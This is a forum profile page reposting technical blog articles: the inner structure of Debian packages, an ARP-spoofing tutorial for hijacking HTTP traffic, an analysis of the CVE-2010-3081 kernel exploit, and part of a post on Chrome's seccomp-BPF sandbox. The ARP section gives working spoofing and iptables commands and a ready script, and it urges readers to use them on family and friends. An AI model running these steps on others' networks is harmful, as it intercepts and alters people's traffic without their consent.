Nytro

Administrators
  • Posts: 18748
  • Joined
  • Last visited
  • Days Won: 719

Everything posted by Nytro

  1. [h=3]Anatomy of a Debian package[/h][h=4]By Ksplice Post Importer on Oct 06, 2010[/h]Ever wondered what a .deb file actually is? How is it put together, and what's inside it, besides the data that is installed to your system when you install the package? Today we're going to break out our sysadmin's toolbox and find out. (While we could just turn to deb(5), that would ruin the fun.) You'll need a Debian-based system to play along. Ubuntu and other derivatives should work just fine. [h=3]Finding a file to look at[/h] Whenever APT downloads a package to install, it saves it in a package cache, located in /var/cache/apt/archives/. We can poke around in this directory to find a package to look at. spang@sencha:~> cd /var/cache/apt/archives spang@sencha:/var/cache/apt/archives> spang@sencha:/var/cache/apt/archives> ls apache2-utils_2.2.16-2_amd64.deb app-install-data_2010.08.21_all.deb apt_0.8.0_amd64.deb apt_0.8.5_amd64.deb aptitude_0.6.3-3.1_amd64.deb ... nano, the text editor, ought to be a simple package. Let's take a look at that one. spang@sencha:/var/cache/apt/archives> cp nano_2.2.5-1_amd64.deb ~/tmp/blog spang@sencha:/var/cache/apt/archives> cd ~/tmp/blog [h=3]Digging in[/h] Let's see what we can figure out about this file. The file command is a nifty tool that tries to figure out what kind of data a file contains. spang@sencha:~/tmp/blog> file --raw --keep-going nano_2.2.5-1_amd64.deb nano_2.2.5-1_amd64.deb: Debian binary package (format 2.0) - current ar archive - archive file Hmm, so file, which identifies filetypes by performing tests on them (rather than by looking at the file extension or something else cosmetic), must have a special test that identifies Debian packages. Since we passed the command the --keep-going option, though, it continued on to find other tests that match against the file, which is useful because these later matches are less specific, and in our case they tell us what a "Debian binary package" actually is under the hood—an "ar" archive! [h=3]Aside: a little bit of history[/h] Back in the day, in 1995 and before, Debian packages used to use their own ad-hoc archive format. These days, you can find that old format documented in deb-old(5). The new format was added to be "saner and more extensible" than the original. You can still find binaries in the old format on archive.debian.org. You'll see that file tells us that these debs are different; it doesn't know how to identify them in a more specific way than "a bunch of bits": spang@sencha:~/tmp/blog> file --raw --keep-going adduser-1.94-1.deb adduser-1.94-1.deb: data Now we can crack open the deb using the ar utility to see what's inside. [h=3]Inside the box[/h] ar takes an operation code and modifier flags and the archive to act upon as its arguments. The x operation tells it to extract files, and the v modifier tells it to be verbose. spang@sencha:~/tmp/blog> ar vx nano_2.2.5-1_amd64.deb x - debian-binary x - control.tar.gz x - data.tar.gz So, we have three files. [h=4]debian-binary[/h] spang@sencha:~/tmp/blog> cat debian-binary 2.0 This is just the version number of the binary package format being used, so tools know what they're dealing with and can modify their behaviour accordingly. One of file's tests uses the string in this file to add the package format to its output, as we saw earlier.
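A quick sketch, using the same package as this walkthrough: ar can also list an archive's members (the t operation) and print a single member to stdout (the p operation), so you can peek at the format version without extracting anything to disk.
$ ar t nano_2.2.5-1_amd64.deb                  # list the three members
$ ar p nano_2.2.5-1_amd64.deb debian-binary    # print one member to stdout (should show "2.0")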
[h=4]control.tar.gz[/h] spang@sencha:~/tmp/blog> tar xzvf control.tar.gz ./ ./postinst ./control ./conffiles ./prerm ./postrm ./preinst ./md5sums These control files are used by the tools that work with the package and install it to the system—mostly dpkg. [h=5]control[/h] spang@sencha:~/tmp/blog> cat control Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting; - filename tab-completion and support for multiple buffers; - full internationalization support. This file contains a lot of important metadata about the package. In this case, we have: its name its version number binary-specific information: which architecture it was built for, and how many bytes it takes up after it is installed its relationship to other packages (on the Depends, Suggests, Conflicts, Breaks, and Replaces lines) the person who is responsible for this package in Debian (the "maintainer") How the package is categorized in Debian as a whole: nano is in the "editors" section. A complete list of archive sections can be found here. A "priority" rating. "Important" means that the package "should be found on any Unix-like system". You'd be hard-pressed to find a Debian system without nano. a homepage a description which should provide enough information for an interested user to figure out whether or not she wants to install the package One line that takes a bit more explanation is the "Provides:" line. This means that nano, when installed, will not only count as having the nano package installed, but also as the editor package, which doesn't really exist—it is only provided by other packages. This way other packages which need a text editor can depend on "editor" and not have to worry about the fact that there are many different sufficient choices available. You can get most of this same information for installed packages and packages from your configured package repositories using the command aptitude show <packagename>, or dpkg --status <packagename> if the package is installed. [h=5]postinst, prerm, postrm, preinst[/h] These files are maintainer scripts. If you take a look at one, you'll see that it's just a shell script that is run at some point during the [un]installation process. spang@sencha:~/tmp/blog> cat preinst #!/bin/sh set -e if [ "$1" = "upgrade" ]; then if dpkg --compare-versions "$2" lt 1.2.4-2; then if [ ! -e /usr/man ]; then ln -s /usr/share/man /usr/man update-alternatives --remove editor /usr/bin/nano || RET=$? rm /usr/man if [ -n "$RET" ]; then exit $RET fi else update-alternatives --remove editor /usr/bin/nano fi fi fi More on the nitty-gritty of maintainer scripts can be found here. 
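If you only want to glance at one of these control files, you don't have to extract the whole archive to disk. A minimal sketch, again using the package from this walkthrough (GNU tar's -O/--to-stdout writes the selected member to stdout):
$ ar p nano_2.2.5-1_amd64.deb control.tar.gz | tar tzf -                 # list the control members
$ ar p nano_2.2.5-1_amd64.deb control.tar.gz | tar xzf - -O ./control    # print just the control file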
[h=5]conffiles[/h] spang@sencha:~/tmp/blog> cat conffiles /etc/nanorc Any configuration files for the package, generally found in /etc, are listed here, so that dpkg knows when to not blindly overwrite any local configuration changes you've made when upgrading the package. [h=5]md5sums[/h] This file contains checksums of each of the data files in the package so dpkg can make sure they weren't corrupted or tampered with. [h=4]data.tar.gz[/h] Here are the actual data files that will be added to your system's / when the package is installed. spang@sencha:~/tmp/blog> tar xzvf data.tar.gz ./ ./bin/ ./bin/nano ./usr/ ./usr/bin/ ./usr/share/ ./usr/share/doc/ ./usr/share/doc/nano/ ./usr/share/doc/nano/examples/ ./usr/share/doc/nano/examples/nanorc.sample.gz ./usr/share/doc/nano/THANKS ./usr/share/doc/nano/changelog.gz ./usr/share/doc/nano/BUGS.gz ./usr/share/doc/nano/TODO.gz ./usr/share/doc/nano/NEWS.gz ./usr/share/doc/nano/changelog.Debian.gz [...] ./etc/ ./etc/nanorc ./bin/rnano ./usr/bin/nano [h=3]Finishing up[/h] That's it! That's all there is inside a Debian package. Of course, no one building a package for Debian-based systems would do the reverse of what we just did, using raw tools like ar, tar, and gzip. Debian packages use a make-based build system, and learning how to build them using all the tools that have been developed for this purpose is a topic for another time. If you're interested, the new maintainer's guide is a decent place to start. And next time, if you need to take a look inside a .deb again, use the dpkg-deb utility: spang@sencha:~/tmp/blog> dpkg-deb --extract nano_2.2.5-1_amd64.deb datafiles spang@sencha:~/tmp/blog> dpkg-deb --control nano_2.2.5-1_amd64.deb controlfiles spang@sencha:~/tmp/blog> dpkg-deb --info nano_2.2.5-1_amd64.deb new debian package, version 2.0. size 566450 bytes: control archive= 3569 bytes. 12 bytes, 1 lines conffiles 1010 bytes, 26 lines control 5313 bytes, 80 lines md5sums 582 bytes, 19 lines * postinst #!/bin/sh 160 bytes, 5 lines * postrm #!/bin/sh 379 bytes, 20 lines * preinst #!/bin/sh 153 bytes, 10 lines * prerm #!/bin/sh Package: nano Version: 2.2.5-1 Architecture: amd64 Maintainer: Jordi Mallach Installed-Size: 1824 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info Suggests: spell Conflicts: pico Breaks: alpine-pico (<= 2.00+dfsg-5) Replaces: pico Provides: editor Section: editors Priority: important Homepage: http://www.nano-editor.org/ Description: small, friendly text editor inspired by Pico GNU nano is an easy-to-use text editor originally designed as a replacement for Pico, the ncurses-based editor from the non-free mailer package Pine (itself now available under the Apache License as Alpine). . However, nano also implements many features missing in pico, including: - feature toggles; - interactive search and replace (with regular expression support); - go to line (and column) command; - auto-indentation and color syntax-highlighting; - filename tab-completion and support for multiple buffers; - full internationalization support. If the package format ever changes again, dpkg-deb will too, and you won't even need to notice. ~spang Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_a_debian_package
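dpkg-deb has a few more read-only modes that are handy for this kind of spelunking; a short sketch, with the flags as documented in dpkg-deb(1):
$ dpkg-deb --contents nano_2.2.5-1_amd64.deb               # list data files without unpacking (same as -c)
$ dpkg-deb --field nano_2.2.5-1_amd64.deb Depends          # print a single control field
$ dpkg-deb --fsys-tarfile nano_2.2.5-1_amd64.deb | tar tf -  # stream data.tar for other tools to consume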
  2. I know the vBulletin part; I need to see what's going on with the comments on Wordpress.
  3. Hijacking HTTP traffic on your home subnet using ARP and iptables By Ksplice Post Importer on Sep 29, 2010 Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols. Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state. The setup Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage: How do we accomplish this? The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address. ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway. Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address 192.168.1.1", and the gateway broadcasts an ARP response saying "I have 192.168.1.1, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet. But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address 192.168.1.1. And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients. Step 1: The layout I did this at home. The three machines involved were: real gateway router: IP address 192.168.1.1, MAC address 68:7f:74:9a:f4:ca fake gateway: a desktop called kid-charlemagne, IP address 192.168.1.200, MAC address 00:30:1b:47:f2:74 test machine getting duped: a laptop on wireless called pixeleen, IP address 192.168.1.111, MAC address 00:23:6c:8f:3f:95 The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains. Step 2: Enable IPv4 forwarding kid-charlemagne wants to be receiving packets that aren't destined for it (eg the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So step 1 is to enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward: root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward Step 3: Set routing rules so packets going through the gateway get routed to you kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes final destination for the web traffic: For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet. 
We can set up this routing rule with the following iptables command: jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \ > -p tcp --dport 80 -j NETMAP --to 192.168.1.200 The iptables command has 3 components: When to apply a rule (-A PREROUTING) What packets get that rule (-p tcp --dport 80) The actual rule (-t nat ... -j NETMAP --to 192.168.1.200) When: -t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied. What packets: That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action: The rule: If we receive a packet heading for some destination, rewrite the destination in the IP header to be 192.168.1.200 (NETMAP --to 192.168.1.200). Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination. In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.1.200, the destination, NATting both ways so this is transparent to the source." One last thing: The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an IP entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0. jesstess@kid-charlemagne:~$ sudo ip addr add 192.168.1.1/24 dev eth0 We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address 192.168.1.200, and the gateway address 192.168.1.1. jesstess@kid-charlemagne:~$ ip addr ... 3: eth0: mtu 1500 qdisc noqueue state UNKNOWN link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff inet 192.168.1.200/24 brd 192.168.1.255 scope global eth0 inet 192.168.1.1/24 scope global secondary eth0 inet6 fe80::230:1bff:fe47:f274/64 scope link valid_lft forever preferred_lft forever ... Step 4: Set yourself up to respond to HTTP requests kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting. Step 5: Test pretending to be the gateway At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for 192.168.1.1". Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.1.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP. We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitous ARP is working. pixeleen's ARP cache before the Gratuitous ARP: jesstess@pixeleen$ arp -a ? (192.168.1.1) at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet] ?
(192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] 68:7f:74:9a:f4:ca is the MAC address of the real gateway router. There are lots of command line utilities and bindings in various programming languages that make it easy to issue ARP packets. I used the arping tool: jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0 192.168.1.1 We'll send a Gratuitous ARP reply (-A), three times (-c 3), on the eth0 interface (-I eth0) for IP address 192.168.1.1. As soon as we generate the Gratuitous ARPs, if we check pixeleen's ARP cache: jesstess@pixeleen$ arp -a ? (192.168.1.1) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] ? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet] Bam. pixeleen now thinks the MAC address for IP address 192.168.1.1 is 0:30:1b:47:f2:74, which is kid-charlemagne's address. If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne's web server. We can watch this whole exchange in Wireshark: First, the Gratuitous ARPs generated by kid-charlemagne: The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for lycos.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet: The HTTP traffic gets served by kid-charlemagne: Note that the HTTP request has a source IP of 192.168.1.111, pixeleen, and a destination IP of 209.202.254.14, which dig -x 209.202.254.14 +short tells us is search-core1.bo3.lycos.com. The HTTP response has a source IP of 209.202.254.14 and a destination IP of 192.168.1.111. The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer. Step 6: Deploy against friends and family I trust you to get creative with this. Step 7: Reset everything to the normal state To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule: jesstess@kid-charlemagne:~$ sudo ip addr delete 192.168.1.1/24 dev eth0 jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d 192.168.1.1, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices. In summary That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to: enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200 add the gateway IP address to the appropriate interface: ip addr add 192.168.1.1/24 dev eth0 ARP for the gateway MAC address: arping -c 3 -A -I eth0 192.168.1.1 substituting the appropriate IP address and interface information and tearing down when you're done. And that's all there is to it! This has been tested as working in a few environments, but it might not work in yours.
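For convenience, the summary steps above can be collected into a rough script. This is only a sketch, run as root on a network you control, using the addresses and interface from this walkthrough (192.168.1.1 real gateway, 192.168.1.200 attacker, eth0); adjust them for your own subnet.
#!/bin/sh
# hijack.sh -- sketch of the setup and teardown steps described above
GW=192.168.1.1        # real gateway's IP address (the one we will claim)
ME=192.168.1.200      # this machine's IP address (NETMAP target)
IF=eth0               # interface facing the clients
case "$1" in
  up)
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to "$ME"
    ip addr add "$GW"/24 dev "$IF"
    arping -c 3 -A -I "$IF" "$GW"    # gratuitous ARP so clients update their caches
    ;;
  down)
    ip addr delete "$GW"/24 dev "$IF"
    iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to "$ME"
    ;;
esac
Run "./hijack.sh up" to start and "./hijack.sh down" to restore; as noted above, you may still need arp -d 192.168.1.1 (or an interface bounce) on the clients.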
I'd love to hear the details on whether this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments. --> Huge thank-you to fellow experimenter adamf. <-- ~jesstess Sursa: https://blogs.oracle.com/ksplice/entry/hijacking_http_traffic_on_your
  4. [h=3]Anatomy of an exploit: CVE-2010-3081[/h][h=4]By Ksplice Post Importer on Sep 22, 2010[/h]It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit. The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security. [h=3]The Ingredients of an Exploit[/h] There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system. The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits. Let's look at each of these in more detail. [h=3]The Bug: CVE-2010-3081[/h] An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel. The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable: We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode. The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct. The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack. Now, here's the core problem. That allocation routine went like this: static inline void __user *compat_alloc_user_space(long len) { struct pt_regs *regs = task_pt_regs(current); return (void __user *)regs->sp - len; } The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. 
But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check. Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt(): int compat_mc_getsockopt(struct sock *sock, int level, int optname, char __user *optval, int __user *optlen, int (*getsockopt)(struct sock *,int,int,char __user *,int __user *)) { This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user. So the attacker's strategy goes like so: Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space. When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code. Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target. The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself. More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light. [h=3]The Target: Function Pointers Everywhere[/h] The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload. A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem. The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. 
It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen. timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/. The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code. Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find. [h=3]The Payload: Steal Privileges[/h] Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns. This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly. This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell. In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence. [h=3]Flexibility, or, You Can't Trust a Failing Exploit[/h] All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. 
For example, on a Fedora 13 system, this exploit errors out with a message like this: $ ./ABftw Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: 2.6.34.6-54.fc13.i686 [...] !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?" Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel. In general, there is almost infinitely much work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too. That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update. ~price Sursa: https://blogs.oracle.com/ksplice/entry/anatomy_of_an_exploit_cve
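Since the bug lives in the 32-bit compat layer of 64-bit kernels, one quick sanity check is whether your kernel was even built with that layer; a hedged sketch (the config file location varies by distribution, and some kernels expose it as /proc/config.gz instead):
$ uname -m                                             # x86_64 kernels are the affected ones
$ grep CONFIG_IA32_EMULATION /boot/config-$(uname -r)  # =y means the 32-bit syscall layer is built in
As the article stresses, though, the reliable answer comes from your vendor's advisory and from updating, not from the presence or absence of an exploit's error message.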
  5. [h=3]Introducing Chrome's next-generation Linux sandbox[/h]Thursday, September 6, 2012 Starting with Chrome 23.0.1255.0, recently released to the Dev Channel, you will see Chrome making use of our next-generation sandbox on Linux and ChromeOS for renderers. We are using a new facility, introduced in Linux 3.5 and developed by Will Drewry called Seccomp-BPF. Seccomp-BPF builds on the ability to send small BPF (for BSD Packet Filter) programs that can be interpreted by the kernel. This feature was originally designed for tcpdump, so that filters could directly run in the kernel for performance reasons. BPF programs are untrusted by the kernel, so they are limited in a number of ways. Most notably, they can't have loops, which bounds their execution time by a monotonic function of their size and allows the kernel to know they will always terminate. With Seccomp-BPF, BPF programs can now be used to evaluate system call numbers and their parameters. This is a huge change for sandboxing code in Linux, which, as you may recall, has been very limited in this area. It's also a change that recognizes and innovates in two important dimensions of sandboxing: Mandatory access control versus "discretionary privilege dropping". Something I always felt strongly about and have discussed before. Access control semantics, versus attack surface reduction. Let's talk about the second topic. Having a nice, high level, access control semantics is appealing and, one may argue, necessary. When you're designing a sandbox for your application, you may want to say things such as: I want this process to have access to this subset of the file system. I want this process to be able to allocate or de-allocate memory. I want this process to be able to interfere (debug, send signals) with this set of processes. The capabilities-oriented framework Capsicum takes such an approach. This is very useful. However, with such an approach it's difficult to assess the kernel's attack surface. When the whole kernel is in your trusted computing base "you're going to have a bad time", as a colleague recently put it. Now, in that same dimension, at the other end of the spectrum, is the "attack surface reduction" oriented approach. The approach where you're close to the ugly guts of implementation details, the one taken by Seccomp-BPF. In that approach, read()+write() and vmsplice() are completely different beasts, because you're not looking at their semantics, but at the attack surface they open in the kernel. They perform similar things, but perhaps ihaquer will have a harder time exploiting read()/write() on pipes than vmsplice(). Semantically, uselib() seems to be a subset of open() + mmap(), but similarly, the attack surface is different. The drawback of course is that implementing particular sandbox semantics with such a mechanism looks ugly. For instance, let's say you want to allow opening any file in /public from within the sandbox, how would you implement that in seccomp-BPF? Well, first you need to understand what set of system calls would be concerned by such an operation. That's not just open(), but also openat() (an ugly implementation-level detail, some libc will happily use openat() with AT_FDCWD instead of open(). 
Then you realize that a BPF program in the kernel will only see a pointer to the file name, so you can't filter on that (even if you could dereference pointers in BPF programs, it wouldn't be safe to do so, because an attacker could create another thread that would modify the file name after it was evaluated by the BPF program, so the kernel would also need to copy it in a safe location). In the end, what you need to do is have a trusted helper process (or broker) that runs unsandboxed for this particular set of system calls and have it accept requests to open files over an IPC channel, have it make the security decision and send the file descriptor back over an IPC. (If you're interested in that sort of approach, pushed to the extreme, look at Markus Gutschke's original seccomp mode 1 sandbox.) That's tedious but doable. In comparison, Capsicum would make this a breeze. There are other issues with such a low-level approach. By filtering system calls, you're breaking the kernel API. This means that third party code (such as libraries) you include in your address space can break. For this reason, I suggested to Will to implement an "exception" mechanism through signals, so that special handlers can be called when system calls are denied. Such handlers are now used and can for instance "broker out" system calls such as open(). In my opinion, the Capsicum and Seccomp-BPF approach are trade-offs, each on the other end of the spectrum. Having both would be great. We could stack one on top of the other and have the best of both worlds. In a similar, but very limited, fashion, this is what we have now in Chrome: we stacked the seccomp-bpf sandbox on top of the setuid sandbox. The setuid sandbox gives a few easy to understand semantic properties: no file system access, no process access outside of the sandbox, no network access. It makes it much easier to layer a seccomp-bpf sandbox on top. Several people besides myself have worked on making this possible. In particular: Chris Evans, Jorge Lucangeli Obes, 